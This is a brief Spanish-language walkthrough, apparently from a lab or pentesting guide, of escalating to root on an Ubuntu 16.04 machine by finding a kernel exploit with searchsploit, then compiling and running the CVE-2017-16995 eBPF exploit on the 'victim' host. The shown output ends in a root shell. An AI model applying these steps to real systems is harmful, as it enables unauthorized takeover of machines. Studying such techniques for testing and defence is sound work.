En primer lugar comprobamos versión de kernel y arquitectura

joe@ubuntu-privesc:~$ cat /etc/issue
Ubuntu 16.04.4 LTS \\n \\l

uname -r

arch

Y buscamos exploit en base a esta versión del kernel de linux, por ejemplo:

searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v " < 4.4.0" | grep -v "4.8”

Simplemente debemos transferirlo a la máquina vícitma, compilarlo y ejecutar:

joe@ubuntu-privesc:~$ **gcc cve-2017-16995.c -o cve-2017-16995**

joe@ubuntu-privesc:~$ ./cve-2017-16995
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88007bd1f100
[*] Leaking sock struct from ffff880079bd9c00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880075c11e40
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880075c11e40
[*] credentials patched, launching shell...
# id
uid=0(root) gid=0(root) groups=0(root),1001(joe)
#